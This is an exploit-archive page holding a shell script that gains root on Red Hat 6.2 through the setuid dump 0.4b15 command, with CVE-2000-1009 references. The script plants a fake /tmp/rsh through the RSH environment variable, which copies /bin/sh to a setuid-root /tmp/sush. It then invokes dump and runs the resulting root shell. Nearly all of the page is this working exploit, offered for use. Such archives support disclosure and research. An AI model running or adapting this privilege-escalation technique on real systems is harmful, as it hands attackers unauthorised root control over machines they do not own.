Lucene search
MatEDB-ID:193HistoryNov 19, 2000 - 12:00 a.m.
dump 0.4b15 - Local Privilege Escalation
2000-11-1900:00:00
mat
www.exploit-db.com
41
AI Score
7.4
Confidence
Low
#!/bin/sh
# Redhat 6.2 dump command executes external program
# with suid priviledge.
# Discovered by Mat <[email protected]>
# Written for and by a scriptkid Tasc ;P
# Remember, there's no cure for BSE
echo "dump-0.4b15 root exploit"
echo "Discovered by Mat <[email protected]>"
echo "-------------------------------------"
echo
DUMP=/sbin/dump
if [ ! -u $DUMP ]; then
echo "$DUMP is NOT setuid on this system or does not exist at all!"
echo
exit 0
fi
export TAPE=iamlame:iamlame
export RSH=/tmp/rsh
cat >/tmp/rsh <<__eof__
#!/bin/sh
cp /bin/sh /tmp/sush
chmod 4755 /tmp/sush
}
__eof__
chmod 755 /tmp/rsh
/sbin/dump -0 /
echo
echo "Waiting for rootshell .... 5 seconds...."
sleep 5
/tmp/sush
id
# milw0rm.com [2000-11-19]Related
cvelist
cvelist
CVE-2000-1009
2000-11-29 05:00:00
exploitdb
exploitdb
dump 0.4b15 (RedHat 6.2) - Local Privilege Escalation
2000-11-29 00:00:00
cert
cert
cve
cve
CVE-2000-1009
2000-12-11 05:00:00
nvd
nvd
CVE-2000-1009
2000-12-11 05:00:00